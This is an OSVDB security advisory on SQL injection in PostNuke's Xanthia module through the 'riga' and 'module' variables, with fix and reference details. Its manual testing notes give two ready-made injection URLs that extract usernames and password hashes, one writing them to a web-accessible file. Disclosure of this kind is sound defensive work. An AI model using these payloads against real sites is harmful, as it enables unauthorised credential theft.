PostNuke Xanthia Module Multiple Variable SQL Injection

2005-05-21T11:01:41
ID OSVDB:16786
Type osvdb
Reporter Maksymilian Arciemowicz(max@jestsuper.pl)
Modified 2005-05-21T11:01:41

Description

Vulnerability Description

The Xanthia Module for PostNuke contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'riga' and 'module' variables in the 'Xanthia' module not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

Solution Description

Upgrade to version 0.750b or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

The Xanthia Module for PostNuke contains a flaw that may allow a remote attacker to inject arbitrary SQL queries. The issue is due to the 'riga' and 'module' variables in the 'Xanthia' module not being properly sanitized and may allow a remote attacker to inject or manipulate SQL queries.

Manual Testing Notes

http://[victim]/[DIR]/index.php?module=Xanthia&type=admin&func=rimuovinuovezone&skinID=1&riga[0]='%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass%20FROM%20pn__users%20WHERE%20pn_uid=2/ http://[victim]/[DIR]/index.php?module=Xanthia'%20UNION%20SELECT%20pn_uname,pn_pass%20FROM%20[db_prefix]users%20WHERE%20pn_uid=2%20INTO%20OUTFILE%20'[DIR_PREFIX]/pnTemp/ Xanthia_cache/cXIb8O3'/&type=admin&func=view

References:

Vendor URL: http://www.postnuke.com/ Secunia Advisory ID:15450 Other Advisory URL: http://news.postnuke.com/Article2691.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0258.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-05/0256.html ISS X-Force ID: 20688 CVE-2005-1694 CVE-2005-1700